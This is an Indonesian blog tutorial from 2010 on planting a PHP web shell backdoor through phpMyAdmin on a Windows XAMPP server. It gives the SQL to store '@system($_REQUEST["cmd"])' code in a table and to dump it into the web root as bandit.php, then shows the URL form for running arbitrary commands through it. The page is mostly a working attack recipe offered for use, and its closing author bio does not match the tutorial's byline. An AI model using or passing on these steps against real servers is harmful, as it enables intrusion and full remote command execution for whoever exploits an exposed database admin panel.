Pasang Backdoor lewat Phpmyadmin (windows) Rahman Surya Praja Rabu, 16 Juni 2010 No Comment

Phpmyadmin adalah perangkat lunak bebas (Open source) yang ditulis dalam bahasa pemrograman php untuk menangani administrasi Mysql.
Disini saya akan mencoba menerangkan tentang Backdoor via phpmyadmin pada webserver windows secara rinci!!
Yang pasti percobaan lewat localhost di windows…saya menggunakan XAMPP dan phpmyadmin 2.11.4!! 
Buka phpmyadminnya dengan URL
http://localhost/phpmyadmin
Setelah terbuka tampilan phpmyadmin, dan klik pada tab SQL / seperti pada telunjuk icon di bawah (query Window)







Kemudian akan muncul  tampilan query window pada phpmyadmin tersebut.
Masukan perintah
SHOW VARIABLES
“SHOW VARIABLES = Untuk mengetahui Base Dir / Direktori pada webserver tersebut”
Nanti pada Variable_name ada basedir (Letak Direktori Servernya)








Keterangan Gambar:
Webserver tersebut terdapat pada Direktori E: ,dan pada Folder server
Untuk lebih jelas mengetahui versi mySQL dan OS nya Lihat paling bawah






Mulai  dech…
Create Database:
belajar
Kemudian pada Database : belajar , ada tab SQL seperti gambar di bawah ini






Dan masukan perintah di bawah pada text area!! 

CREATE TABLE iseng(
dor TEXT) TYPE=MYISaM;
INSERT INTO iseng(dor)
VALUES(
'<pre><body bgcolor=silver ><? @system($_REQUEST["cmd"]); ?></body></pre>');


Keterangan perintah di atas:  Membuat table “iseng”  dan membuat field “dor” dengan type “text” sedangkan MyISAM adalah tipe tabel default dalam MySQL dan isi text tesebut adalah “ <? @system($_REQUEST["cmd"]); ?>“  itu adalah perintah untuk request ke system menggunakan bahasa PHP

Setelah itu klik pada tab SQL lagi, masukan perintah ini

select * into dumpfile 'E:/server/htdocs/bandit.php' from iseng;

keterangan perintah di atas adalah : kita coba dump sebuah file ke Direktori E: pada folder server dan htdocs adalah direktori yang akan ditampilkan oleh web server (Localhost) 

Selesai, Ketik URL :
http://localhost/bandit.php?cmd=cmd

Selanjutnya terserah anda
Dengan menggunakan perintah-perintah CMD pada windows!!!

Note: perintah-perintah CMD yang anda masukan harus seperti ini “/bandit.php?cmd=perintah_CMD”
by Jillur Rahman

Jillur Rahman is a Web designers. He enjoys to make blogger templates. He always try to make modern and 3D looking Templates. You can by his templates from Themeforest.

Follow him @ Twitter | Facebook | Google Plus

No Comment

Terima Kasih Sudah berkunjung!! Di Mohon Untuk Meninggalkan Komen, untuk mempererat silaturahmi.... ^_^